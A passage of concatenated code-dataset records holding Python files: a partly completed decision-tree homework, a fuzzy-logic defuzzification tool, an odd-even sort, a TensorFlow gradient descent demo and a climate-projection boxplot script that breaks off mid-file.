sumEntropy+=Tree.entropy(labelList)*len(labelList)/len(Y)\n ce=sumEntropy\n\n\n\n \n\n\n\n \n #########################################\n return ce \n \n \n \n #--------------------------\n @staticmethod\n def information_gain(Y,X):\n '''\n Compute the information gain of y after spliting over attribute x\n InfoGain(Y,X) = H(Y) - H(Y|X) \n Input:\n X: a list of values, a numpy array of int/float/string values.\n Y: a list of values, a numpy array of int/float/string values.\n Output:\n g: the information gain of y after spliting over x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n HY=Tree.entropy(Y)\n HYX=Tree.conditional_entropy(Y,X)\n g=HY-HYX\n\n\n \n #########################################\n return g\n\n\n #--------------------------\n @staticmethod\n def best_attribute(X,Y):\n '''\n Find the best attribute to split the node. \n Here we use information gain to evaluate the attributes. \n If there is a tie in the best attributes, select the one with the smallest index.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n Output:\n i: the index of the attribute to split, an integer scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n besti=None\n bestGain=-math.inf\n for i in range(len(X)):\n attList=[]\n for j in range(len(X[0])):\n attList.append(X[i][j])\n g=Tree.information_gain(Y,attList)\n if(g>bestGain):\n besti=i\n bestGain=g\n\n \n\n \n #########################################\n return besti\n\n \n #--------------------------\n @staticmethod\n def split(X,Y,i):\n '''\n Split the node based upon the i-th attribute.\n (1) split the matrix X based upon the values in i-th attribute\n (2) split the labels Y based upon the values in i-th attribute\n (3) build children nodes by assigning a submatrix of X and Y to each node\n (4) build the dictionary to combine each value in the i-th attribute with a child node.\n \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n i: the index of the attribute to split, an integer scalar\n Output:\n C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n attList=[]\n xList={}\n yList={}\n for j in range(len(X[0])):\n att=X[i][j]\n if (att in attList):\n #Add to list if list already has index\n xList.get(att).append(X[:,j])\n yList.get(att).append(Y[j])\n continue\n attList.append(att)\n xList[att]=[X[:,j]]\n yList[att]=[Y[j]]\n xList[att]=np.array(xList[att])\n yList[att]=np.array(yList[att])\n childList={}\n for key in attList:\n childX=np.transpose(xList[key])\n childY=np.transpose(yList[key])\n child=Node(childX, childY)\n childList[key]=child\n \n #########################################\n return childList\n\n #--------------------------\n @staticmethod\n def stop1(Y):\n '''\n Test condition 1 (stop splitting): whether or not all the instances have the same label. \n \n Input:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Output:\n s: whether or not Conidtion 1 holds, a boolean scalar. \n True if all labels are the same. Otherwise, false.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n s=True\n #Returns false if any dont match the first item in list\n for i in range(len(Y)):\n if(Y[i]==Y[0]):\n continue\n return False\n\n\n\n \n #########################################\n return s\n \n #--------------------------\n @staticmethod\n def stop2(X):\n '''\n Test condition 2 (stop splitting): whether or not all the instances have the same attribute values. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Output:\n s: whether or not Conidtion 2 holds, a boolean scalar. \n '''\n #########################################\n ## INSERT YOUR CODE HERE\n s=True #Return True Otherwise\n\n #Return false if something doesnt match \n for i in range(len(X)):\n for j in range(len(X[0])):\n if(X[i][j]!=X[i][0]):\n return False\n\n\n \n #########################################\n return s\n \n \n #--------------------------\n @staticmethod\n def most_common(Y):\n '''\n Get the most-common label from the list Y. \n Input:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Here n is the number data instances in the node.\n Output:\n y: the most common label, a scalar, can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n c=Counter(Y)\n y=(c.most_common(1))[0][0]\n \n #########################################\n return y\n \n \n \n #--------------------------\n @staticmethod\n def build_tree(t):\n '''\n Recursively build tree nodes.\n Input:\n t: a node of the decision tree, without the subtree built.\n t.X: the feature matrix, a numpy float matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances, p is the number of attributes.\n t.Y: the class labels of the instances in the node, a numpy array of length n.\n t.C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n for i in range (1000): #Replace with while true once termination no longer concern\n if(Tree.stop1(t.Y)): #If tree is Homogenous prediction Label, Stop and make Leaf\n t.isLeaf=True\n t.p=Tree.most_common(t.Y)\n return t\n elif(Tree.stop2(t.X)):#If tree is Homogenous attributes, Stop and make Leaf\n t.isLeaf=True\n t.p=Tree.most_common(t.Y)\n return t\n else: # Else Split on Best Attribute, and recurse (I believe this is where the error is)\n attSplit=Tree.best_attribute(t.X, t.Y)\n child=Tree.split(t.X, t.Y, attSplit)\n child.i=attSplit\n t.C=child\n return Tree.build_tree(t)\n\n \n\n\n \n #########################################\n \n \n #--------------------------\n @staticmethod\n def train(X, Y):\n '''\n Given a training set, train a decision tree. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the training set, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Output:\n t: the root of the tree.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n\n\n \n #########################################\n return t\n \n \n \n #--------------------------\n @staticmethod\n def inference(t,x):\n '''\n Given a decision tree and one data instance, infer the label of the instance recursively. \n Input:\n t: the root of the tree.\n x: the attribute vector, a numpy vectr of shape p.\n Each attribute value can be int/float/string.\n Output:\n y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n \n\n\n\n\n \n #########################################\n return y\n \n #--------------------------\n @staticmethod\n def predict(t,X):\n '''\n Given a decision tree and a dataset, predict the labels on the dataset. \n Input:\n t: the root of the tree.\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the dataset, p is the number of attributes.\n Output:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n\n\n #########################################\n return Y\n\n\n\n #--------------------------\n @staticmethod\n def load_dataset(filename = 'data1.csv'):\n '''\n Load dataset 1 from the CSV file: 'data1.csv'. \n The first row of the file is the header (including the names of the attributes)\n In the remaining rows, each row represents one data instance.\n The first column of the file is the label to be predicted.\n In remaining columns, each column represents an attribute.\n Input:\n filename: the filename of the dataset, a string.\n Output:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the dataset, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n \n #########################################\n return X,Y\n\n\n\n","repo_name":"link101011/CS539","sub_path":"part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":15773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31871455829","text":"import numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\nfrom Fuzzy_System import Read_Data\nimport re\nimport logging\n\n\ndef build_fuzzy_universe(fuzzy_sets, consequent):\n universe_variables = {}\n # create custom membership functions for variable, for each of its statuses.\n for variable_name, variable_statuses in fuzzy_sets.items():\n try:\n # find range of statuses values for each variable - aka their smallest and highest value\n smallest, largest = find_minmax_values(variable_statuses)\n # now create the ctrl universe variable using the aforementioned range\n if variable_name.lower() == consequent.lower():\n # the +1 is currently a mystery - doesn't work properly without it\n # if you add \"bisector\" or \"lom\" etc to ctrl.consequent you can get the other results\n # todo for later perhaps?\n universe_variables[variable_name] = ctrl.Consequent(np.arange(smallest, largest + 1), variable_name)\n else:\n universe_variables[variable_name] = ctrl.Antecedent(np.arange(smallest, largest + 1), variable_name)\n # adding each of the statuses and their values to the universe variables\n for status in variable_statuses:\n status_name = status[0]\n status_values = status[1]\n universe_variables[variable_name][status_name] = fuzz.trapmf(universe_variables[variable_name].universe,\n status_values)\n except Exception as e:\n logging.error(e)\n return universe_variables\n\n\ndef find_minmax_values(variable_statuses):\n small_values = []\n large_values = []\n for variable_status in variable_statuses:\n try:\n # take the smallest/largest value for each status\n small_values.append(min(variable_status[1]))\n large_values.append(max(variable_status[1]))\n except Exception as e:\n logging.error(e)\n # then take the smallest/largest value among all statuses\n smallest = min(small_values)\n largest = max(large_values)\n return smallest, largest\n\n\ndef build_fuzzy_rules(rules, variables):\n args = 1\n ctrl_rules = []\n for rule in rules:\n try:\n rule_split = rule.split(\"then\")\n antecedents = dict(re.findall('(\\w+)\\s*is\\s*[not]* (\\w+)', rule_split[0]))\n consequents = re.findall('(\\w+)\\s*is\\s*[not]* (\\w+)', rule_split[1])\n words_in_rule = rule_split[0].split(\" \")\n # loops through the antecedent part of the rule. If it finds and/or,\n # it grabs the next word as the antecedent and adds it to the rules\n # if it finds `not', it appends it to the rule\n for i in range(3, len(words_in_rule)):\n try:\n if words_in_rule[i - 3] == \"if\":\n args = variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n elif words_in_rule[i - 3] == \"and\":\n if words_in_rule[i] == \"not\":\n args = args & ~ variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n else:\n args = args & variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n elif words_in_rule[i - 3] == \"or\":\n if words_in_rule[i] == \"not\":\n args = args | ~ variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n else:\n args = args | variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n except KeyError as e:\n logging.error(\"Could not recognise antecedent variable: {}. \"\n \"Make sure each variable is only one word.\".format(words_in_rule[i]))\n # couldn't get consequent to handle not :(\n consequent = variables[consequents[0][0]][consequents[0][1]]\n ctrl_rules.append(ctrl.Rule(args, consequent))\n except Exception as e:\n logging.error(e)\n return ctrl_rules\n\n\ndef defuzzify(rules, measurements):\n rule_ctrl = ctrl.ControlSystem(rules)\n rulebase = ctrl.ControlSystemSimulation(rule_ctrl)\n for variable, value in measurements.items():\n try:\n rulebase.input[variable] = value\n except Exception as e:\n logging.error(e)\n try:\n rulebase.compute()\n except Exception as e:\n logging.error(e)\n exit()\n return rulebase\n\n\ndef is_data_valid(fuzzy_sets, rules, measurements):\n if len(fuzzy_sets) == 0:\n logging.error(\"Couldn't find any valid fuzzy sets!\")\n return False\n if len(rules) == 0:\n logging.error(\"Couldn't find any valid rules!\")\n return False\n if len(measurements) == 0:\n logging.error(\"Couldn't find any valid measurements!\")\n return False\n if len(fuzzy_sets) <= len(measurements):\n logging.warning(\n \"ERROR: Not enough fuzzy sets have been added in the input, or too many measurements have been included. \"\n \"Make sure a fuzzy set is present for each variable, including consequent variables.\")\n return False\n else:\n return True\n\n\ndef main():\n # first, read the main file and separate the sections\n input_txt = Read_Data.read_input_txt(\"rules_and_data\")\n # input_txt will return false if any of the 3 mandatory headers are missing\n if not input_txt:\n logging.warning(\"Exiting...\")\n exit(1)\n\n # then, format the sections according to need\n fuzzy_sets = Read_Data.format_fuzzy_sets(input_txt[\"fuzzysets\"]) # dict of dicts\n rules = Read_Data.format_rules(input_txt[\"rulebase\"]) # dict\n measurements = Read_Data.format_measurements(input_txt[\"measurements\"]) # dict\n\n if not is_data_valid(fuzzy_sets, rules, measurements):\n logging.warning(\"The input data is not valid. Please check the message above for more details. Exiting...\")\n exit(1)\n\n # we build a different fuzzy universe for each rule base (in case there are multiple given)!\n for rulebase_pair, rules_values in rules.items():\n consequent = rulebase_pair[1]\n rulebase_name = rulebase_pair[0]\n universe_variables = build_fuzzy_universe(fuzzy_sets, consequent)\n fuzzy_rules = build_fuzzy_rules(rules_values, universe_variables)\n # once the rules and universe variables have been created, defuzzify rule base unknown value\n calculated_rulebase = defuzzify(fuzzy_rules, measurements)\n print(\"The defuzzified suggested value of \" + consequent + \" for the \" + rulebase_name + \" is:\")\n print(calculated_rulebase.output[consequent])\n universe_variables[consequent].view(sim=calculated_rulebase)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VahalaSly/Fuzzy_System","sub_path":"Defuzzify.py","file_name":"Defuzzify.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17875382969","text":"import random\r\nfrom Swap.Swap import swap\r\nimport timeit\r\n\r\n#push for github from windows console\r\n\r\n\"\"\"Decorator to be able tu mesure the time of execution\"\"\"\r\ndef wrapper(func, *args, **kwargs):\r\n def wrapped():\r\n return func(*args, **kwargs)\r\n return wrapped\r\n\r\n\r\ndef pair_impair(arr):\r\n for i in range(1, len(arr)-1):\r\n #paire impaire\r\n for j in range(0, len(arr)-1, 2):\r\n if arr[j] >= arr[j+1]:\r\n arr[j], arr[j+1] = swap(arr[j], arr[j+1])\r\n #impaire paire\r\n for j in range(1, len(arr)-1, 2):\r\n if arr[j] >= arr[j+1]:\r\n arr[j], arr[j+1] = swap(arr[j], arr[j+1])\r\n return arr\r\n\r\n\r\nprint(\"\\n###############\\tPaire Impaire Sort\\t################\\n\")\r\narr = [random.randint(0, 100) for x in range(100)]\r\nprint(\"Before sort :\", arr)\r\nprint(\"After sort :\", pair_impair(arr))\r\n\r\n\"\"\"Time of execution\"\"\"\r\nwrapped = wrapper(pair_impair, arr)\r\nprint(\"Time of execution : \", timeit.timeit(wrapped, number=1), \"s\")\r\n","repo_name":"Somonntc/Sort","sub_path":"Tri/pair_impair.py","file_name":"pair_impair.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3528241238","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom ex1_cost_function import *\n#from ex2_derivative_function import *\nfrom ex3_update_value import *\nimport time\nimport tensorflow as tf\n\ndef main():\n\t# Draw cost function\n\tx = np.arange(-10, 15, 0.1)\n\ty = [cost_function(i) for i in x]\n\tplt.plot(x, y)\n\tplt.ylabel('Cost Value')\n\tplt.xlabel('Input Variable')\n\tplt.title('Click on the figure to run Gradient Descent Algorithm')\n\tplt.waitforbuttonpress()\n\n\t# Run gradient descent\n\tl_rate = 0.01\n\tx = tf.Variable(-10, dtype = tf.float32)\n\tcost = 3*x**2 - 12*x + 4\n\ttrain = tf.train.GradientDescentOptimizer(l_rate).minimize(cost)\n\tinit = tf.global_variables_initializer()\n\tsess = tf.Session()\n\tsess.run(init)\n\tfor i in range(100):\n\t\tsess.run(train)\n\t\tx_op = sess.run(x)\n\t\tplt.plot(x_op, cost_function(x_op), 'r+')\n\t\tplt.pause(0.1)\n\n\tprint('Optimized variable: x_op = ', x_op)\n\tprint('Optimized value: f(x_op)=', cost_function(x_op))\t\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"thanhhff/VietAI-Foundation-Doc","sub_path":"lec_04/Tutorial4-GradientDescent/main_tf.py","file_name":"main_tf.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"12387239756","text":"import matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport pandas as pd\nimport iris\nfrom ascend import shape\nfrom glob import glob as glob\nimport os\nimport argparse\n\nfrom esmvaltool.diagnostics import plotting\n# works in SCITOOLS Default/next (2021-03-18)\n\nPLOT_PATH = \"/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/plots\"\nDATA_PATH = \"/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/plot_data\"\n\ndef mask_wp2_atlas_data(cube, shp):\n # mask wp2 data using shape file\n\n # approach varies depending on if cube is downloaded from WP2 atlas\n # or direct from Glen's folders\n if cube.ndim == 4:\n # first get lat / lon mask over 2 dimensions\n xy_mask = np.logical_not(shp.cube_intersection_mask(cube[0,:,:,0]))\n # broadcast to 3d\n xyp_mask = np.broadcast_to(xy_mask[:,:,np.newaxis], cube.shape[1:])\n # broadcast to 4d\n cube_mask = np.broadcast_to(xyp_mask, cube.shape)\n else:\n # 3 dimensional (lat, lon, percentile)\n # get 2d mask\n xy_mask = np.logical_not(shp.cube_intersection_mask(cube[:,:,0]))\n # broadcast to 3d\n cube_mask = np.broadcast_to(xy_mask[:,:,np.newaxis], cube.shape)\n\n # apply to cube\n # combine with existing mask\n cube_mask = np.logical_or(cube_mask, cube.data.mask)\n cube.data.mask = cube_mask\n\n return cube\n\n\ndef load_wp2_atlas(method, var, area, season):\n # load netCDF file\n base_path = \"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/weighting_data/WP2_atlas\"\n\n # define region constraint if lat and lon supplied\n if type(area) == list:\n region = iris.Constraint(\n longitude=lambda x: area[0] <= x <= area[1],\n latitude=lambda x: area[2] <= x <= area[3]\n )\n\n bxp_obs = []\n for data in [\"cons\", \"uncons\"]:\n # do not load uncons data for CALL or ASK methods\n if data == \"uncons\":\n if any(m in method for m in [\"ASK\", \"CALL\"]):\n continue\n\n fname = f\"{base_path}/atlas_EUCP_{method}_{data}_{var}.nc\"\n cube = iris.load_cube(fname)\n\n # extract shape / region\n if type(area) == list:\n cube = cube.extract(region)\n else:\n cube = mask_wp2_atlas_data(cube, area)\n\n if season == \"JJA\":\n # use first time point (JJA)\n cube = cube[0]\n elif season == \"DJF\":\n cube = cube[1]\n else:\n raise ValueError(\"Only JJA and DJF available.\")\n\n # area average\n cube.coord(\"latitude\").units = \"degrees\"\n cube.coord(\"latitude\").guess_bounds()\n cube.coord(\"longitude\").units = \"degrees\"\n cube.coord(\"longitude\").guess_bounds()\n grid_areas = iris.analysis.cartography.area_weights(cube)\n cube_mean = cube.collapsed([\"latitude\", \"longitude\"], iris.analysis.MEAN, weights=grid_areas)\n\n # create boxplot stats object\n if data == \"cons\":\n label = method\n else:\n label = None\n\n bxp_stats = {\n \"whislo\": cube_mean.extract(iris.Constraint(percentile=10)).data.item(),\n \"q1\": cube_mean.extract(iris.Constraint(percentile=25)).data.item(),\n \"med\": cube_mean.extract(iris.Constraint(percentile=50)).data.item(),\n \"q3\": cube_mean.extract(iris.Constraint(percentile=75)).data.item(),\n \"whishi\": cube_mean.extract(iris.Constraint(percentile=90)).data.item(),\n \"label\": label\n }\n\n bxp_obs.append(bxp_stats)\n\n return bxp_obs\n\n\ndef load_wp2_glen(var, area, season):\n # Load WP2 constraint data from files in Glen's user space.\n # define constraint if using a rectangle\n if type(area) == list:\n region = iris.Constraint(\n longitude=lambda x: area[0] <= x <= area[1],\n latitude=lambda x: area[2] <= x <= area[3]\n )\n\n results = []\n season = season.lower()\n for d_type in [\"all\", \"prior\"]:\n file_name = f\"/data/users/hadgh/eucp/data/v13/d23map/{var}Anom/{season}/{var}Anom_rcp85_eu_300km_W{d_type}-N600000-P21_cdf_b9514_20y_{season}_20401201-20601130.nc\"\n\n cube = iris.load_cube(file_name)\n\n # extract shape / region\n if type(area) == list:\n cube = cube.extract(region)\n else:\n cube = mask_wp2_atlas_data(cube, area)\n\n grid_areas = iris.analysis.cartography.area_weights(cube)\n cube_mean = cube.collapsed([\"latitude\", \"longitude\"], iris.analysis.MEAN, weights=grid_areas)\n\n # create boxplot stats object\n if d_type == \"all\":\n label = \"UKCP constraint\"\n else:\n label = None\n\n bxp_stats = {\n \"whislo\": cube_mean.extract(iris.Constraint(percentile=10)).data.item(),\n \"q1\": cube_mean.extract(iris.Constraint(percentile=25)).data.item(),\n \"med\": cube_mean.extract(iris.Constraint(percentile=50)).data.item(),\n \"q3\": cube_mean.extract(iris.Constraint(percentile=75)).data.item(),\n \"whishi\": cube_mean.extract(iris.Constraint(percentile=90)).data.item(),\n \"label\": label\n }\n\n results.append(bxp_stats)\n\n return results\n\n\ndef load_esmval_gridded_data(recipe, var, proj, area, season, use_lsm=True):\n # load gridded anomaly data that has been produced by the ESMValTool recipe\n # recipe: name of recipe run that contains data, e.g. recipe_GCM_and_RCM_pan_EU_20211214_170431\n # variable: tas or pr\n # proj: type of data to load, e.g. cmip5, cmip6, cordex, cpm, UKCP18 land-gcm, UKCP18 land-rcm\n # area: area to compute area averages for. As a shape file for now..\n # season: season to load data for, djf, mam, jja or son\n # use_lsm: apply Land sea mask to mask out ocean\n # return an array of the computed area means for each data file (model) found\n\n # first get path to where all the files will be\n season = season.upper()\n input_path = f\"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/esmvaltool_output/{recipe}/work/{var}_anoms/main/{season}/\"\n\n if use_lsm:\n # setup land mask shape\n lsm = shape.load_shp(\n '/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/shape_files/ne_110m_land/ne_110m_land.shp'\n ).unary_union()\n # need to reduce size of lsm to avoid bug in ascend\n # see https://github.com/MetOffice/ascend/issues/8\n corners = [(-30, 20), (-30, 75), (50, 75), (50, 20)]\n rectangle = shape.create(corners, {'shape': 'rectangle'}, 'Polygon')\n lsm = lsm.intersection(rectangle)\n\n # process each file for the required datatype\n fnames = glob(f\"{input_path}/{proj}_*.nc\")\n\n values = {}\n\n for fname in fnames:\n # ignore diff or mean files\n if any([s in fname for s in ['diff', 'mean']]):\n continue\n\n # load data\n cube = iris.load_cube(fname)\n\n # check proportion of area covered by valid cube data\n # ignore data if this is less than 1\n # i.e. there is not data for the whole of the shape\n area_cov = check_data_shape_intersection(cube, area)\n if area_cov < 0.9:\n print(f\"WARNING: Data in {os.path.basename(fname)} only covers {area_cov * 100}% of supplied area\")\n continue\n if area_cov < 1.0:\n print(f\"WARNING: Data in {os.path.basename(fname)} only covers {area_cov * 100}% of supplied area\")\n\n # now mask data\n # could also achieve maskng via preprocessor functions from esmvaltool \n # if it is necesary to run this outside the met office where ascend is not available\n if use_lsm:\n mask = lsm.intersection(area)\n mask.mask_cube_inplace(cube)\n else:\n mask = area\n\n # and compute weighted area average\n # this is using weighted area weights from Ascend\n awts = mask.cube_2d_weights(cube, False)\n nwts = iris.analysis.cartography.area_weights(cube)\n\n wts = awts.data * nwts\n area_mean = cube.collapsed(['longitude', 'latitude'], iris.analysis.MEAN, weights=wts)\n\n # get model name etc. from filename\n # want everything between the type and anom i.e.\n # type_<this bit>_anom_season.nc\n mname = os.path.basename(fname).split(f\"{proj}_\")[1]\n mname = mname.split(\"_anom\")[0]\n\n values[mname] = area_mean.data.item()\n\n return values\n\n\ndef check_data_shape_intersection(cube, shp):\n # return proportion of grid boxes in shp (when put on same grid as cube)\n # that have valid corresponding data in cube\n\n # check cube has a coord system, if not add one\n if cube.coord('longitude').coord_system is None:\n cube.coord('longitude').coord_system = iris.coord_systems.GeogCS(6371229.0)\n cube.coord('latitude').coord_system = iris.coord_systems.GeogCS(6371229.0)\n\n # first check intersection of cube bounding box with shape\n # i.e. if the shape doesn't lie entirely inside the cube\n # bounds we can return false immediately\n int = shape.cube_bbox_shape_intersection(cube, shp)\n diff = shp.difference(int)\n if diff.data.area > 0.0:\n return 0.0\n\n # now check intersection of cube data mask with shape\n shape_mask = shp.cube_2d_weights(cube).data\n data_mask = np.invert(cube.data.mask)\n\n data_shape_intersection = shape_mask * data_mask\n\n valid_boxes = np.sum(data_shape_intersection) / np.sum(shape_mask)\n\n return valid_boxes\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"recipe\")\n parser.add_argument(\"variable\")\n parser.add_argument(\"season\")\n parser.add_argument(\"gcm_anoms_recipe\")\n parser.add_argument(\"area_name\")\n parser.add_argument(\"--shape_file\")\n args = parser.parse_args()\n\n recipe = args.recipe\n var = args.variable\n season = args.season\n area = args.area_name\n anoms_files = f\"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/esmvaltool_output/{args.gcm_anoms_recipe}/work/global_tas_anomalies/anomalies/\"\n shp_file = args.shape_file\n\n if area == \"boe\":\n area = shape.create([(-5,42), (30,42), (30,52), (-5,52)], {'shape': 'rectangle', 'NAME': 'boe'}, 'Polygon')\n use_lsm = True\n elif area == \"berthou\":\n area = shape.create([(-12,49), (21,49), (21,59), (-12,59)], {'shape': 'rectangle', 'NAME': 'berthou'}, 'Polygon')\n use_lsm = False\n else:\n print(f\"Loading {area} shape from {shp_file}\")\n area = shape.load_shp(shp_file, name=area)[0]\n use_lsm = True\n\n # read data and place in a dataframe\n plot_df = pd.DataFrame(columns=[\"model\", \"value\", \"project\", \"data type\"])\n\n # easiest way seems to be to append a row at a time\n for proj in [\"CMIP5\", \"CMIP6\", \"CORDEX\", \"cordex-cpm\", \"UKCP18 land-gcm\", \"UKCP18 land-rcm\"]:\n data_dict = load_esmval_gridded_data(recipe, var, proj, area, season, use_lsm)\n for k, v in data_dict.items():\n row = [k, v, proj, \"standard\"]\n plot_df.loc[len(plot_df)] = row\n\n # load gcm temp anoms\n anoms = {}\n for p in [\"CMIP5\", \"CMIP6\", \"UKCP18\"]:\n csv_file = f\"{anoms_files}{p}_global_tas_anom.csv\"\n anoms[p] = pd.read_csv(csv_file, header=None, dtype={0:'string'})\n\n # now loop over values loaded and construct the temp weighted anomaly\n for row in anoms[p].iterrows():\n # get the appropriate model value\n if p == \"UKCP18\":\n proj = \"UKCP18 land-gcm\"\n else:\n proj = p\n m_val = plot_df[(plot_df[\"model\"] == row[1][0]) & (plot_df[\"project\"] == proj)][\"value\"].values\n if len(m_val) == 0:\n continue\n if len(m_val) > 1:\n raise ValueError(f\"Found multiple entries for {row[1][0]}\")\n\n m_val = m_val[0]\n\n # compute the weighted anomaly\n # i.e. we divide by the global anomaly to get degrees of warming\n # per 1 degree of global warming\n weighted_anom = m_val / row[1][1]\n\n # now add new row in the datframe with the weighted info\n new_row = [row[1][0], weighted_anom, proj, \"weighted\"]\n plot_df.loc[len(plot_df)] = new_row\n\n\n # List of models for Romania case study\n # niculita_model_list = [\n # 'RCA4 MPI-M-MPI-ESM-LR',\n # 'RCA4 MOHC-HadGEM2-ES',\n # 'RCA4 ICHEC-EC-EARTH',\n # 'RCA4 CNRM-CERFACS-CNRM-CM5',\n # 'REMO2009 MPI-M-MPI-ESM-LR',\n # 'RACMO22E MOHC-HadGEM2-ES',\n # 'RACMO22E ICHEC-EC-EARTH', \n # 'HIRHAM5 ICHEC-EC-EARTH',\n # ]\n\n # list of models with evolving aerosols. See table B2 from:\n # Gutiérrez, C., Somot, S., Nabat, P., Mallet, M., Corre, L., Van Meijgaard, E., et al. (2020). Future evolution of surface solar radiation and photovoltaic potential in Europe: investigating the role of aerosols. Environmental Research Letters, 15(3). https://doi.org/10.1088/1748-9326/ab6666\n aerosol_model_list = []\n for c in plot_df[plot_df[\"project\"] == \"CORDEX\"][\"model\"]:\n if any([s in c for s in ['RACMO22E', 'ALADIN', 'HadREM3']]):\n aerosol_model_list.append(c)\n\n # case_study_model_list = aerosol_model_list\n # case_study_model_list = niculita_model_list\n case_study_model_list = []\n\n # This dictionary maps CPM string to a RCM GCM string\n cpm_drivers = {\n 'CNRM-AROME41t1': 'ALADIN63 CNRM-CERFACS-CNRM-CM5',\n 'CLMcom-CMCC-CCLM5-0-9': 'CCLM4-8-17 ICHEC-EC-EARTH',\n 'HCLIMcom-HCLIM38-AROME': 'HCLIMcom-HCLIM38-ALADIN ICHEC-EC-EARTH',\n 'GERICS-REMO2015': 'REMO2015 MPI-M-MPI-ESM-LR',\n 'COSMO-pompa': 'CCLM4-8-17 MPI-M-MPI-ESM-LR',\n 'ICTP-RegCM4-7-0': 'ICTP-RegCM4-7-0 MOHC-HadGEM2-ES',\n 'ICTP-RegCM4-7': 'ICTP-RegCM4-7-0 MOHC-HadGEM2-ES',\n 'KNMI-HCLIM38h1-AROME': 'KNMI-RACMO23E KNMI-EC-EARTH',\n 'SMHI-HCLIM38-AROME': 'SMHI-HCLIM38-ALADIN ICHEC-EC-EARTH',\n 'HadREM3-RA-UM10.1': 'MOHC-HadGEM3-GC3.1-N512 MOHC-HadGEM2-ES'\n }\n\n # List of CPM drivers from CORDEX to know which to plot as triangles\n cpm_driver_list = []\n for n in plot_df[plot_df[\"project\"] == \"cordex-cpm\"][\"model\"]:\n cpm_driver_list.append(cpm_drivers[n.split()[0]])\n\n # CMIP5 CORDEX drivers can be inferred directly from CORDEX model names\n cordex_driver_list = list(\n set(\n [plotting.remove_institute_from_driver(n.split(' ')[1]) for n in plot_df[plot_df[\"project\"] == \"CORDEX\"][\"model\"]]\n )\n )\n\n driving_models = {\n \"CORDEX\": cordex_driver_list,\n \"CPM\": cpm_driver_list,\n \"UKCP\": list(plot_df[plot_df[\"project\"] == \"UKCP18 land-rcm\"][\"model\"]),\n \"case study\": case_study_model_list\n }\n\n # load WP2 atlas constraint data\n if area.attributes[\"NAME\"] == \"berthou\":\n constraint_data = None\n else: \n constraint_data = {}\n for m in plotting.WP2_METHODS.keys():\n try:\n constraint_data[m] = load_wp2_atlas(m, var, area, season)\n except OSError:\n # Skip method if not available\n continue\n\n # also load Glen's UKCP data\n constraint_data[\"UKMO_CMIP6_UKCP\"] = load_wp2_glen(var, area, season)\n\n # now plot\n # panel plot\n if len(case_study_model_list) > 0:\n case_study = True\n else:\n case_study = False\n plotting.panel_boxplot(plot_df, constraint_data, driving_models, area, season, var, PLOT_PATH, case_study)\n\n # change per degrees of warming plot\n plotting.relative_to_global_plot(plot_df, area, season, var, PLOT_PATH)\n\n # also output dataframe of source data for plots\n 